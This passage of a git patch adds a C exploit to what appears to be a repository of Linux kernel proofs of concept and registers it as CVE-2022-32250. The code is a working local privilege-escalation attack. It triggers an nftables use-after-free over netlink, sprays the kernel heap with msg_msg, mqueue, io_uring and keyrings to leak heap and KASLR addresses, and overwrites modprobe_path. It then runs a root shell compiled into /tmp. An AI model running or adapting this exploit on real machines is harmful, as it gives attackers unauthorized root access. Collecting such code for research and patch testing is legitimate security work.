mnl_nlmsg_batch_next(batch); + + if (nl == NULL) { + err(1, "mnl_socket_open"); + } + + printf("[+] setting stable %s and set\n", table_name); + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), +mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } +} + +void set_trigger_set_and_overwrite(struct mnl_socket* nl, const char *name, const char *set_name) +{ + char * table_name = name; + uint8_t family = NFPROTO_IPV4; + uint32_t set_id = 1; + struct nftnl_expr * exprs[128]; + int exprid = 0; + struct nlmsghdr * nlh; + + struct nftnl_set * set_trigger = nftnl_set_alloc(); + + nftnl_set_set_str(set_trigger, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set_trigger, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set_trigger, NFTNL_SET_FLAGS, NFT_SET_EXPR); + nftnl_set_set_u32(set_trigger, NFTNL_SET_KEY_LEN, 1); + nftnl_set_set_u32(set_trigger, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(set_trigger, NFTNL_SET_ID, set_id); + exprs[exprid] = nftnl_expr_alloc("lookup"); + nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable"); + nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1); + nftnl_set_add_expr(set_trigger, exprs[exprid]); + exprid++; + + char buf[MNL_SOCKET_BUFFER_SIZE*2]; + + struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + int seq = 0; + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE|NLM_F_ACK, seq++); + nftnl_set_nlmsg_build_payload(nlh, set_trigger); + nftnl_set_free(set_trigger); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (nl == NULL) { + err(1, "mnl_socket_open"); + } + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), +mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + printf("[+] triggering UAF set and overwrite *(prevchunk+0x18)\n"); +} + +void set_cpu_affinity(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) + do_error_exit("sched_setaffinity"); +} + +void spray_mqueue(mqd_t mqdes, char *msgptr, int spray_size) +{ + char msgrv[BUFFER]; + unsigned rvprio, sdprio = 1; + struct timespec ts; + int unresolved = 0; + + int priority = 0; + + printf("[*] spraying mqueue...\n"); + for(int i=0; i= 0x31 && size <= 0x1000 - 0x8); + printf("[*] try to spray msg_msg\n"); + spray->mtype = 1; + + memset(spray->mtext, 0x41, size - 0x30); + + for (int i = 0; i < amount; i++) + { + if(i % 0x10 == 0) + printf("[*] spraying msg_msg: 0x%x\n", i); + if (msgsnd(qid, spray, size - 0x30, 0) == -1) + { + perror("msgsend failure"); + exit(-1); + } + } + return; +} + +static inline int io_uring_setup(uint32_t entries, struct io_uring_params *p) { + return syscall(__NR_io_uring_setup, entries, p); +} + +static inline int io_uring_register(int fd, unsigned int opcode, void *arg, unsigned int nr_args) { + return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args); +} + + +struct fd_uring *spray_uring(uint32_t spray_size, struct fd_uring *fd_buffer) { + + for (uint64_t i = 0; i < spray_size; i++) { + + fd_buffer[i].params = malloc(sizeof(struct io_uring_params)); + if (!fd_buffer[i].params) + do_error_exit("malloc"); + memset(fd_buffer[i].params, 0, sizeof(struct io_uring_params)); + + fd_buffer[i].fd = io_uring_setup(SPRAY_NB_ENTRIES, fd_buffer[i].params); + if (fd_buffer[i].fd < 0) + do_error_exit("io_uring_create"); + + } + return fd_buffer; +} + +void release_uring(struct fd_uring *fd_buffer, uint32_t buffer_size) { + + for (uint32_t i = 0; i < buffer_size; i++) { + close(fd_buffer[i].fd); + } + free(fd_buffer); +} + +void release_partial_uring(struct fd_uring *fd_buffer, uint32_t buffer_idx) { + + close(fd_buffer[buffer_idx].fd); +} + +void prepare_root_shell(void) { + create_dummy_file(); + create_priv_file(); +} + +void create_dummy_file(void) { + int fd; + + fd = open(dummy_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO); + write(fd, dummy_content, sizeof(dummy_content)); + close(fd); +} + +void create_priv_file(void) { + int fd; + + fd = open(priv_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO); + write(fd, priv_context, sizeof(priv_context)); + close(fd); + + system("gcc -o /tmp/shell /tmp/shell.c -w"); +} + +void write_new_modprobe() { + + int fd, fd_modprobe; + char modprobe_name[0x10] = {0, }; + + fd_modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY); + read(fd_modprobe, modprobe_name, 14); + close(fd_modprobe); + + printf("[*] current modprobe name: %s\n", modprobe_name); + fd = open(modprobe_name, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO); + if (fd < 0) + do_error_exit("open"); + + write(fd, new_modprobe_content, sizeof(new_modprobe_content)); + + close(fd); +} + +void setup_modprobe_payload() { + write_new_modprobe(); +} + +void userland_T(int *sema) +{ + while(*sema); +} + +void sema_up(int *sema) +{ + *sema = 1; +} + +void sema_down(int *sema) +{ + *sema = 0; +} + +int main(int argc, char ** argv) +{ + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + setvbuf(stderr, 0, 2, 0); + char c; + char writebuf[0x2000]; + + char mqname[MQUEUE_NUM][NAMELEN] = {"/qname1", "/qname2", "/qname3", "/qname4", "/qname5"}; + mqd_t mqid[MQUEUE_NUM]; + struct mq_attr attr; + attr.mq_flags = 0; + attr.mq_maxmsg = 10; + attr.mq_msgsize = BUFFER; + attr.mq_curmsgs = 0; + int uaf_id = 0; + + int *sema = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0); + int *sema2 = malloc(0x10); + + prepare_root_shell(); + sema_up(sema); + if(fork()) + { + set_cpu_affinity(1, getpid()); + userland_T(sema); + sleep(1); + printf("\n\n[------------------------- stage 4: Execute Malicious File -------------------------------]\n"); + setup_modprobe_payload(); + execve("/tmp/dummy", NULL, NULL); + execve("/tmp/shell", NULL, NULL); + } + + unshare_setup(getuid(), getgid()); + + set_cpu_affinity(0, 0); + + struct fd_uring *fd_buffer = calloc(SPRAY_SIZE, sizeof(struct fd_uring)); + if (!fd_buffer) + do_error_exit("calloc"); + + for(int i=0; i<5; i++) + if((mqid[i] = mq_open(mqname[i], O_CREAT | O_RDWR, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH, &attr)) < 0) + bye("MQUEUE"); + + struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); + + printf("\n\n[------------------------- stage 0: Allocate stable table and set ------------------------]\n"); + set_stable_table_and_set(nl, "table1"); + set_stable_table_and_set(nl, "table2"); + set_stable_table_and_set(nl, "table3"); + set_stable_table_and_set(nl, "table4"); + + printf("\n\n[------------------------- stage 1: Leak heap address ------------------------------------]\n"); + set_trigger_set_and_overwrite(nl, "table1", "set_trigger0"); + + key_serial_t *id_buffer = spray_keyring(0, SPRAY_KEY_SIZE); + + set_trigger_set_and_overwrite(nl, "table1", "set_trigger1"); + if((uaf_id = get_keyring_leak(id_buffer, SPRAY_KEY_SIZE)) == SPRAY_KEY_SIZE) + bye("[-] leak failed..."); + + printf("\n\n[------------------------- stage 2: Leak KASLR address -----------------------------------]\n"); + + spray_uring(SPRAY_SIZE, fd_buffer); + + set_trigger_set_and_overwrite(nl, "table2", "set_trigger2"); + spray_mqueue(mqid[0], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4); + + release_partial_uring(fd_buffer, SPRAY_SIZE-1); + for(int i = 3; i > 113; i++) + release_partial_uring(fd_buffer, SPRAY_SIZE-i); + release_partial_uring(fd_buffer, SPRAY_SIZE-2); + set_trigger_set_and_overwrite(nl, "table2", "set_trigger3"); + key_serial_t *id_buffer3 = spray_keyring_list_del_purpose(SPRAY_KEY_SIZE*2, heap_base, heap_base, 0x28);// keyring <-> msg_msg overlap + gather_mqueue(mqid[0], 1); + + sleep(1); + printf("\n\n[------------------------- stage 3: Overwrite modprobe_path ------------------------------]\n"); + + set_trigger_set_and_overwrite(nl, "table3", "set_trigger4"); + spray_mqueue(mqid[1], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4); + set_trigger_set_and_overwrite(nl, "table3", "set_trigger5"); + id_buffer = spray_keyring_list_del_purpose(1, modprobe_addr-0x8+0x1, (heap_base&0xffffffff00000000)+0x2f706d74, 0x10); + sema_down(sema); + gather_mqueue_nosave(mqid[1], 1); + + sleep(1); + for(int i=SPRAY_SIZE/2+12; i Date: Fri, 10 Mar 2023 20:57:19 +0800 Subject: [PATCH 2/2] update data/KernelPocs/KernelPocs.yaml. --- data/KernelPocs/KernelPocs.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/data/KernelPocs/KernelPocs.yaml b/data/KernelPocs/KernelPocs.yaml index 9abb08b..ee1a443 100644 --- a/data/KernelPocs/KernelPocs.yaml +++ b/data/KernelPocs/KernelPocs.yaml @@ -9,3 +9,4 @@ ExplorerItems: - ConfigFile: CVE-2021-4204/CVE-2021-4204.yaml - ConfigFile: CVE-2022-25636/CVE-2022-25636.yaml - ConfigFile: CVE-2023-0179/CVE-2023-0179.yaml + - ConfigFile: CVE-2022-32250/CVE-2022-32250.yaml